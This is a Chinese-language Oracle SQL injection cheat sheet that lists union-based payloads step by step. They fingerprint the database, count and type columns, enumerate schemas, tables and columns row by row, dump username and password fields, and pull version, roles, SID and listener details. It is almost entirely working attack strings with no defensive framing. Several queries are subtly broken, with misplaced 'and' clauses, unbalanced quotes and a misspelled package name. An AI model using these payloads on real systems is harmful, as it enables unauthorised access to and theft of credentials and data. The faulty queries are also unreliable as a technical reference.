SQL注入--Oracle

1.判断是否为oracle数据库

id=88 and exists(select *from dual)

id=88 and exists(select *from user_tables)这两个表都是系统表，返回正常则为oralce数据库

2.查询字段数

order by 4 异常

order by 3 正常   最大列数为3

3.判断字段类型

id=88 union select null,null,null from dual 判断这三个列是否有类型异常，返回正常则继续

id=88 and 1=2 union select 'ss',null,null/null,'ss',null/null,null,'ss'  返回正常判断哪个列数为字符型 可用来显示查询结果

4获取所有数据库的名字(假设第二位为字符型)

id=88 and 1=2 union select null,(select global_name from global_name),null from dual

id=88 and 1=2 union select null, (select sys.database_name from dual),null from dual

id=88 and 1=2 union select null,(select name from v$database),null from dual  几个特殊的库的名字

id=88 and 1=2 union select null,(select owner from all_tables where rownum=1),null from dual

id=88 and 1=2 union select null,(select owner from all_tables where owner<>'第一个库名' and rownum=1),null from dual

id=88 and 1=2 union select null,(select owner from all_tables where owner<>'第一库名'and owner <>'第二个库名'and rownum=1),null from dual

每次查询将前面的库排除掉

5.获取当前库的所有表

id=88 and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual

id=88 and 1=2 union select null,(select table_name from user_tables where and table_name<>'第一个表名'rownum=1),null from dual

id=88 and 1=2 union select null,(select table_name from user_tables where and table_name<>'第一个表名'and table_name<>'第二个表名' and rownum=1),null from dual

6.查询表的字段名

id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名'and rownum=1),null from dual

id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名 and column_name <>‘第一个字段名’and rownum=1),null from dual

id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名 and column_name <>‘第一个字段名’ and column_name<>'第二个字段名'and rownum=1),null from dual

7.查询字段值

id=88 and 1=2 union select null,username,password from '表名字'--

8.其他重要信息

null,(select banner from sys.v_$version where rownum=1)数据库版本

null,(select * from session_roles where rownum=1)当前用户权限

null,(select name from v$database) 数据库名

null,(select table_name from user_tables where rownum=1)当前库所有表

null,(select member from v$logfile where rownum=1)服务器系统

null,(select utl_inadder.get_host_address from dual)服务器监听IP

null,(select instance_name from v$instance)数据库SID